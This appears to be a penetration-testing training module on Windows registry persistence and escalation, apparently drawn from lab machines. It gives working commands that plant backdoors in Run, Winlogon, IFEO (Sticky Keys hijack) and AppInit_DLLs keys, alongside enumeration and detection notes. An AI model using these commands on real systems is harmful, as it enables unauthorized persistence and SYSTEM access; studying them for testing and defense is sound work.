Back to All Modules

Registry-Based Escalation

#Overview

The Windows Registry contains numerous locations where programs, services, and the OS itself read configuration data during startup or user logon. If an attacker can write to these keys, they can achieve persistence or privilege escalation by pointing to a malicious binary or script.

#Prerequisites

  • Write access to registry keys (may require SeImpersonatePrivilege, or a service account with registry write permissions)
  • Ability to place a malicious binary on disk or reference an existing one

#Detection & Enumeration

# Check AutoRun keys
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"

# Check Winlogon keys
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit

# Check Image File Execution Options (IFEO)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Check AppInit_DLLs
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs

# Check services with writable registry paths using accesschk
accesschk.exe /accepteula -uwcqv "Authenticated Users" * /accepteula

# Check for writable registry keys
accesschk.exe /accepteula -kw "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
CMD

#PowerUp.ps1 Automated Checks

# Import PowerUp
Import-Module .\PowerUp.ps1

# Check all registry-based escalation vectors
Get-ModifiableRegistryAutoRun

# Check IFEO debugger entries
Get-ModifiablePath

# Check for AlwaysInstallElevated
Get-AlwaysInstallElevated

# Full unprivileged check
Invoke-AllChecks
POWERSHELL

#Exploitation / Execution

#AutoRun Key Persistence

# Add a persistent entry (requires admin or per-user)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\temp\backdoor.exe"

# Per-user auto-run (no admin needed)
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\temp\backdoor.exe"
CMD

#Winlogon Shell Replacement

# Replace the shell (destructive — replaces explorer.exe)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\temp\backdoor.exe"

# Safer: use Userinit (runs before shell)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\temp\backdoor.exe"
CMD

#Image File Execution Options (IFEO) Debugger

# Set a debugger for a legitimate program that runs as SYSTEM
# When sethc.exe (Sticky Keys) is executed at the lock screen, it launches our binary instead
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\temp\backdoor.exe"

# At the lock screen, press Shift 5 times to trigger
# Common IFEO targets: sethc.exe, Utilman.exe, osk.exe, Magnify.exe, Narrator.exe
CMD

#AppInit_DLLs

# Load a custom DLL into any process that loads user32.dll
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\temp\evil.dll"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1

# Note: Requires LoadAppInit_DLLs=1 and SecureBoot may block this on modern Windows
CMD

#Common Pitfalls

  • ⚠️ IFEO debugger only triggers when the target executable is launched — Sticky Keys (sethc.exe) at the lock screen is the most reliable trigger
  • ⚠️ AppInit_DLLs is blocked when Secure Boot is enabled (Windows 8+)
  • ⚠️ Modifying Winlogon Shell replaces explorer.exe — the desktop won't load normally
  • ⚠️ HKLM keys require Administrator or SYSTEM access; HKCU keys only affect the current user

#OPSEC Considerations

  • 🛡️ Registry modifications to Run/RunOnce keys are visible in autoruns analysis (Sysinternals Autoruns)
  • 🛡️ IFEO debugger entries show up in autoruns and are easily detected
  • 🛡️ Windows Event ID 4657 logs registry value modifications when Object Access auditing is enabled
  • 🛡️ EDR products commonly monitor HKLM Run keys and IFEO entries

#Post-Exploitation Value

Registry-based escalation provides either immediate privilege escalation (IFEO with SYSTEM programs) or persistence (Run keys, Winlogon). Combined with a reverse shell or executable, this grants persistent SYSTEM access.

#Tool References

ToolLink
PowerUphttps://github.com/PowerShellMafia/PowerSploit
Autorunshttps://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
accesschkhttps://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

#Source Machines

  • Support (Easy, Windows)
  • StreamIO (Hard, Windows)
  • ServMon (Easy, Windows)